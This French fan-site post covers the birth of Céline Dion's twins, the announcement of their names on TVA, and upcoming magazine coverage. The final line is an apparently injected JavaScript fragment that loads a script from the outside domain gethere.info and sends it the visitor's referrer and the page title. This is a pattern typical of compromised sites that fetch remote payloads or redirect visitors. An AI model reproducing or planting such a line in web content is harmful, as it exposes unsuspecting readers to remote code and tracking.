Le samedi 23 octobre venaient au monde deux enfants très attendus par leurs parents mais aussi par des milliers de fans. En effet, Céline a donné naissance à ses jumeaux, deux petits garçons de 2,55 kg et 2,38 kg. L’accouchement n’a duré que 36 minutes et tout s’est bien déroulé. Depuis samedi, les informations peinent à nous parvenir. Nous savons que Céline et les petits garçons vont bien, que Céline les a allaités et que d’ici 2 ou 3 jours, toute la famille devrait regagner leur maison de Jupiter Island.
Mais une question subsiste. Comment se prénomment ces deux nouveau-nés ??
Cela fait depuis samedi que vous attendez cette information…
Et ce soir, enfin, René a révélé les prénoms de ses petits garçons, en direct sur TVA !
Eddy et Nelson
Nous avons bien hâte de voir les premières photos des jumeaux (qui ne devraient pas être prises avant quelques semaines pour ensuite se retrouver à la une de nombreux magazines) mais d’ici là, nous avons des nouvelles de Céline ce jeudi soir puisque TVA diffus l’entrevue avec Julie Snyder, enregistrée il y a quelques jours, émission durant laquelle René devrait nous informer des derniers évènements.
A l’attention de tous les fans anglophones : The Red Heads vous proposeront, le plus rapidement possible, une vidéo sous-titrée en anglais de l’entrevue avec Julie Snyder. Stay tuned !
Sachez que vous pouvez trouver dans les kiosques français le magazine « Gala » dans lequel 10 pages sont consacrées à Céline. Elle et René se livrent sur la naissance de leurs jumeaux et l’on peut retrouver les photos prises par Gérard Schachmès qui ont illustré l’article de « Hello » et « 7 jours » au Québec. Les Suisses et les Belges ne seront pas en reste puisque « Ciné Télé Revue » en Belgique et « L’illustré » en Suisse consacreront également leur couverture à Céline. D’autres pays tels que l’Espagne, la Russie et le Royaume-Uni verront aussi défiler quelques « unes » dans leurs kiosques.
Les jours qui ont précédé l’accouchement, Céline a vu passer beaucoup de média dans sa villa, et malgré la fatigue elle a su rester fidèle à elle-même : souriante, disponible et pleine d’humour. A noter que nous aurons aussi l’opportunité de découvrir quelques clichés pris par Gérard Schachmès de René et René-Charles jouant au baseball.
The Red Heads
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;